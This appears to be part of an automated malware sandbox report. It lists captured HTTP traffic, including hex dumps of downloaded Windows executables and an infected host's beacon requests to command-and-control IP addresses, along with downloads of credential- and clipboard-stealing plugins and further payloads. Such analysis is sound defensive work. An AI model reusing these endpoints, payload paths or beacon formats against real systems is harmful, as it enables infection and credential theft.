00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 7c 61 04 00 00 40 0d 00 00 62 04 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 b0 11 00 00 76 00 00 00 56 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 18 Apr 2024 21:40:13 GMTContent-Type: application/octet-streamContent-Length: 2327552Last-Modified: Thu, 18 Apr 2024 21:22:33 GMTConnection: keep-aliveETag: "66218f19-238400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 9f 1a ea 14 fe 74 b9 14 fe 74 b9 14 fe 74 b9 5f 86 77 b8 1f fe 74 b9 5f 86 71 b8 d4 fe 74 b9 5f 86 73 b8 15 fe 74 b9 d6 7f 89 b9 10 fe 74 b9 d6 7f 70 b8 07 fe 74 b9 d6 7f 77 b8 0e fe 74 b9 d6 7f 71 b8 4f fe 74 b9 5f 86 70 b8 0c fe 74 b9 5f 86 72 b8 15 fe 74 b9 5f 86 75 b8 0f fe 74 b9 14 fe 75 b9 34 ff 74 b9 e7 7c 7d b8 08 fe 74 b9 e7 7c 74 b8 15 fe 74 b9 e7 7c 8b b9 15 fe 74 b9 14 fe e3 b9 15 fe 74 b9 e7 7c 76 b8 15 fe 74 b9 52 69 63 68 14 fe 74 b9 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 0c 9a 1f 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 34 11 00 00 32 04 00 00 00 00 00 00 10 59 00 00 10 00 00 00 50 11 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 59 00 00 04 00 00 4d c2 23 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 5a 58 00 4c 00 00 00 6d 10 15 00 95 00 00 00 00 50 14 00 ec b5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 5a 58 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 5a 58 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 e4 13 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 14 00 00 10 00 00 00 3e 09 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ec b5 00 00 00 50 14 00 00 82 00 00 00 4e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 10 15 00 00 02 00 00 00 d0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 40 2a 00 00 20 15 00 00 02 00 00 00 d2 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 69 72 61 67 7a 65 6a 00 b0 19 00 00 60 3f 00 00 ae 19 00 00 d4 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 71 75 73 70 6e 7a 61 00 10 00 00 00 10 59 00 00 02 00 00 00 82 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 18 Apr 2024 21:40:15 GMTContent-Type: application/octet-streamContent-Length: 1285632Last-Modified: Thu, 01 Feb 2024 16:00:36 GMTConnection: keep-aliveETag: "65bbc024-139e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c6 de c9 0d 82 bf a7 5e 82 bf a7 5e 82 bf a7 5e d9 d7 a3 5f 91 bf a7 5e d9 d7 a4 5f 92 bf a7 5e d9 d7 a2 5f 32 bf a7 5e 57 d2 a2 5f c4 bf a7 5e 57 d2 a3 5f 8d bf a7 5e 57 d2 a4 5f 8b bf a7 5e d9 d7 a6 5f 8f bf a7 5e 82 bf a6 5e 43 bf a7 5e 19 d1 ae 5f 86 bf a7 5e 19 d1 a7 5f 83 bf a7 5e 19 d1 58 5e 83 bf a7 5e 19 d1 a5 5f 83 bf a7 5e 52 69 63 68 82 bf a7 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 0f bf bb 65 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 18 00 c0 0f 00 00 52 04 00 00 00 00 00 68 06 0d 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 14 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 89 12 00 58 00 00 00 78 89 12 00 8c 00 00 00 00 20 14 00 f8 00 00 00 00 60 13 00 28 ad 00 00 00 00 00 00 00 00 00 00 00 30 14 00 f4 15 00 00 b0 9e 11 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 9f 11 00 08 01 00 00 00 00 00 00 00 00 00 00 00 d0 0f 00 e8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 be 0f 00 00 10 00 00 00 c0 0f 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e2 cd 02 00 00 d0 0f 00 00 ce 02 00 00 c4 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 4c bb 00 00 00 a0 12 00 00 44 00 00 00 92 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 28 ad 00 00 00 60 13 00 00 ae 00 00 00 d6 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 94 00 00 00 00 10 14 00 00 02 00 00 00 84 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 f8 00 00 00 00 20 14 00 00 02 00 00 00 86 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f4 15 00 00 00 30 14 00 00 16 00 00 00 88 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 18 Apr 2024 21:40:19 GMTContent-Type: application/octet-streamContent-Length: 2277888Last-Modified: Thu, 18 Apr 2024 21:22:36 GMTConnection: keep-aliveETag: "66218f1c-22c200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 9f 1a ea 14 fe 74 b9 14 fe 74 b9 14 fe 74 b9 5f 86 77 b8 1f fe 74 b9 5f 86 71 b8 d4 fe 74 b9 5f 86 73 b8 15 fe 74 b9 d6 7f 89 b9 10 fe 74 b9 d6 7f 70 b8 07 fe 74 b9 d6 7f 77 b8 0e fe 74 b9 d6 7f 71 b8 4f fe 74 b9 5f 86 70 b8 0c fe 74 b9 5f 86 72 b8 15 fe 74 b9 5f 86 75 b8 0f fe 74 b9 14 fe 75 b9 34 ff 74 b9 e7 7c 7d b8 08 fe 74 b9 e7 7c 74 b8 15 fe 74 b9 e7 7c 8b b9 15 fe 74 b9 14 fe e3 b9 15 fe 74 b9 e7 7c 76 b8 15 fe 74 b9 52 69 63 68 14 fe 74 b9 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 0c 9a 1f 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 34 11 00 00 48 04 00 00 00 00 00 00 90 57 00 00 10 00 00 00 50 11 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 57 00 00 04 00 00 7e b2 23 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 38 db 56 00 4c 00 00 00 5e 10 15 00 72 00 00 00 00 50 14 00 f8 b2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 db 56 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 da 56 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 e4 13 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 14 00 00 10 00 00 00 3e 09 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f8 b2 00 00 00 50 14 00 00 80 00 00 00 4e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 10 15 00 00 02 00 00 00 ce 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 80 29 00 00 20 15 00 00 02 00 00 00 d0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 73 70 63 7a 73 72 72 00 f0 18 00 00 a0 3e 00 00 ec 18 00 00 d2 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 68 76 75 6c 72 79 6a 00 10 00 00 00 90 57 00 00 04 00 00 00 be 22 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 18 Apr 2024 21:40:19 GMTContent-Type: application/octet-streamContent-Length: 112128Last-Modified: Thu, 01 Feb 2024 16:00:35 GMTConnection: keep-aliveETag: "65bbc023-1b600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 f6 04 b3 63 97 6a e0 63 97 6a e0 63 97 6a e0 38 ff 69 e1 69 97 6a e0 38 ff 6f e1 eb 97 6a e0 38 ff 6e e1 71 97 6a e0 b6 fa 6e e1 6c 97 6a e0 b6 fa 69 e1 72 97 6a e0 b6 fa 6f e1 42 97 6a e0 38 ff 6b e1 64 97 6a e0 63 97 6b e0 02 97 6a e0 f8 f9 63 e1 60 97 6a e0 f8 f9 6a e1 62 97 6a e0 f8 f9 95 e0 62 97 6a e0 f8 f9 68 e1 62 97 6a e0 52 69 63 68 63 97 6a e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 11 bf bb 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 24 01 00 00 9a 00 00 00 00 00 00 ec 66 00 00 00 10 00 00 00 40 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 02 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 20 a1 01 00 9c 00 00 00 bc a1 01 00 50 00 00 00 00 d0 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 d4 14 00 00 f0 8f 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 90 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 36 23 01 00 00 10 00 00 00 24 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 69 00 00 00 40 01 00 00 6a 00 00 00 28 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 1c 17 00 00 00 b0 01 00 00 0c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 d0 01 00 00 02 00 00 00 9e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d4 14 00 00 00 e0 01 00 00 16 00 00 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET /Pneh2sXQk0/Plugins/cred64.dll HTTP/1.1Host: 193.233.132.56
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: GET /mine/amert.exe HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: GET /Pneh2sXQk0/Plugins/clip64.dll HTTP/1.1Host: 193.233.132.56
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 35 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000054001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 35 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000055001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /cost/random.exe HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: GET /enigma/Plugins/cred64.dll HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 35 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000056001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: GET /cost/sarra.exe HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: GET /enigma/Plugins/clip64.dll HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
